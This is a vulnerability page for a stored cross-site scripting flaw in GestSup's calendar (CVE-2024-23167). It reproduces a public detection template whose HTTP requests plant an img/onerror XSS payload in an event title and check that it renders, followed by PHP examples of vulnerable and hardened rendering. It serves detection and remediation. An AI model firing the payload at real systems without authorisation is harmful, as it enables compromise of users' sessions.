CVE-2024-23167: GestSup - Cross-Site Scripting

Date: 2025-08-01 | Affected software: GestSup | PoC: public

Vulnerability description

GestSup lets any of its users add events to the calendar shared by all users. The request below (reproduced in the PoC template) is the one sent when a user adds an event to their calendar.

PoC code [public]

id: CVE-2024-23167

info:
  name: GestSup - Cross-Site Scripting
  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
  severity: high
  description: |
    GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.
  impact: |
    This vulnerability could allow unauthenticated attackers to compromise users accessing the Calendar feature of the application.
  remediation: |
    Apply security patches, validate and sanitize inputs to prevent XSS, and ensure proper authentication. Prevent JavaScript execution in the calendar.php file.
  reference:
    - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23167
    - https://doc.gestsup.fr/install/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-23167
  metadata:
    max-request: 3
    vendor: gestsup
    product: gestsup
  tags: cve2024,cve,xss,gestsup

variables:
  formatted_date: "{{date_time('2006/01/02')}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /ajax/calendar.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        action=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1

    matchers:
      - type: word
        part: response
        words:
          - '{"event_id":"'
          - 'text/html'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login={{username}}&pass={{password}}&submit=submit

      - |
        GET /index.php?page=calendar HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'view=activity'
          - '?page=calendar'
          - '<img/src/onerror=alert(document.domain)>'
        condition: and

      - type: word
        part: header
        words:
          - text/html
# digest: 4a0a0047304502203e21190b9d4cec0f5916adc0717d424ccdeb513979d05710c448cd0eabb23c1d02210084c42767680f2ddce77a6e01a9d5c2f532c3d5991d027cc45b6cc79e3916ae6d:922c64590222798bb761d5b6d8e72950
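The template's remediation line asks for input validation and for preventing JavaScript execution from calendar data. The following PHP is an added example written for this page, not GestSup's own code: it shows the defect class (a stored event title written into HTML unencoded) next to the hardened form, plus the two server-side checks a defender would add to the add_event handler. The function names, the `$_SESSION`-style `user_id` key and the 200-character title limit are assumptions; the sample title is the payload already shown in the template.

```php
<?php
// Added example for this page, not GestSup's code. Function names and the
// session key 'user_id' are assumptions used for illustration only.

// Constructed sample: the event title stored by the request in the template.
$stored_title = '<img/src/onerror=alert(document.domain)>';

// Vulnerable pattern: the stored title is concatenated into HTML as-is, so the
// browser parses the <img> element and runs its onerror handler for every
// user who opens the calendar page (a stored XSS).
function render_event_vulnerable(string $title): string
{
    return '<div class="event-title">' . $title . '</div>';
}

// Hardened: encode for the HTML text context at output time. ENT_QUOTES also
// makes the result safe inside quoted attributes; ENT_SUBSTITUTE returns U+FFFD
// instead of an empty string when the input is not valid UTF-8.
function render_event_html(string $title): string
{
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="event-title">' . $safe . '</div>';
}

// Calendar widgets are usually fed by a JSON endpoint such as /ajax/calendar.php.
// The JSON_HEX_* flags encode <, >, &, ' and " so the document cannot break out
// of an inline <script> block either, and the endpoint should answer with
// Content-Type: application/json (the template's matcher checks for text/html on
// that endpoint, a sign the response was being treated as HTML).
function event_to_json(array $event): string
{
    return json_encode(
        $event,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Input-side checks for the add_event action: the CVSS vector records PR:N, so
// the handler must first require an authenticated session, then bound the
// title. Validation here does not replace the output encoding above; it only
// limits what is stored.
function validate_add_event(array $session, array $post): array
{
    if (empty($session['user_id'])) {
        return ['ok' => false, 'error' => 'authentication required'];
    }
    $title = trim((string) ($post['title'] ?? ''));
    if ($title === '' || mb_strlen($title, 'UTF-8') > 200) {
        return ['ok' => false, 'error' => 'invalid title'];
    }
    return ['ok' => true, 'title' => $title];
}

// Demonstration run: compare the raw and encoded output for the same title.
echo render_event_vulnerable($stored_title), PHP_EOL;
echo render_event_html($stored_title), PHP_EOL;
echo event_to_json(['event_id' => 1, 'title' => $stored_title]), PHP_EOL;
var_dump(validate_add_event([], ['title' => $stored_title]));
var_dump(validate_add_event(['user_id' => 7], ['title' => $stored_title]));
```

Running the script prints the same title twice, once as live markup and once with `<` and `>` encoded as entities, followed by the JSON form with the same characters hex-escaped. The last two calls show the unauthenticated request being rejected before anything is stored, while an authenticated request is accepted and left to the output encoding to neutralize.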
